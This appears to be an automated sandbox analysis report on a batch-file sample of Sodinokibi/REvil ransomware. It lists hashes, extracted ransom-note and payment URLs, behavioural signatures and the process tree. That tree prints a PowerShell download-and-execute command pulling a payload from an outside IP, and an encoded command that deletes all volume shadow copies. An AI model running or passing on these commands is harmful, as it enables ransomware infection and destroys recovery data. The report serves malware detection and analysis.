Analysis
-
max time kernel
34s -
max time network
52s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
20-05-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
a1ced45242d2149282fc0a7230280012.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
a1ced45242d2149282fc0a7230280012.bat
Resource
win10v200430
General
-
Target
a1ced45242d2149282fc0a7230280012.bat
-
Size
217B
-
MD5
41b00aedcf17cecfbeb6362ce3bcd14f
-
SHA1
c18a004d285abadf2b5840c9bb31c5cb9ae3a80c
-
SHA256
33347fdae792b3a0eb66bd0476b6ddcfb4aa1334e8a0de8a7f0aa8b2d07daa50
-
SHA512
1f0c5e210b4485ba274345201f4e5e5a5c30e5d217a347835ff2e759a8522f322d7428d33b9a529ad134930f9d65ccf642f8c84be93dc8cca8aeac40061ec455
Malware Config
Extracted
http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012
Extracted
C:\qyn76iw4-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/364473B984C95D99
http://decryptor.cc/364473B984C95D99
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 17 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\qyn76iw4-readme.txt powershell.exe File opened for modification \??\c:\program files\CopyMove.dib powershell.exe File created \??\c:\program files\microsoft sql server compact edition\qyn76iw4-readme.txt powershell.exe File opened for modification \??\c:\program files\StartEdit.php powershell.exe File created \??\c:\program files\qyn76iw4-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertStep.wpl powershell.exe File opened for modification \??\c:\program files\MeasureCompare.rtf powershell.exe File opened for modification \??\c:\program files\UninstallUnblock.wmv powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\qyn76iw4-readme.txt powershell.exe File opened for modification \??\c:\program files\BackupDisconnect.wmx powershell.exe File opened for modification \??\c:\program files\ExportConfirm.vst powershell.exe File opened for modification \??\c:\program files\FindUninstall.midi powershell.exe File opened for modification \??\c:\program files\PingSuspend.docx powershell.exe File opened for modification \??\c:\program files\SendSubmit.tif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\qyn76iw4-readme.txt powershell.exe File opened for modification \??\c:\program files\RedoRegister.mpeg powershell.exe File opened for modification \??\c:\program files\UninstallPop.vsdm powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1396 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1304 wrote to memory of 1396 1304 cmd.exe powershell.exe PID 1396 wrote to memory of 1608 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1608 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1608 1396 powershell.exe powershell.exe PID 1396 wrote to memory of 1608 1396 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1608 powershell.exe 1608 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe 1396 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 2 1396 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1396 powershell.exe Token: SeDebugPrivilege 1608 powershell.exe Token: SeBackupPrivilege 524 vssvc.exe Token: SeRestorePrivilege 524 vssvc.exe Token: SeAuditPrivilege 524 vssvc.exe Token: SeTakeOwnershipPrivilege 1396 powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lxdh05b344.bmp" powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\a1ced45242d2149282fc0a7230280012.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/a1ced45242d2149282fc0a7230280012');Invoke-KZMZWDCRYF;Start-Sleep -s 10000"2⤵
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Sets desktop wallpaper using registry
PID:1396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:524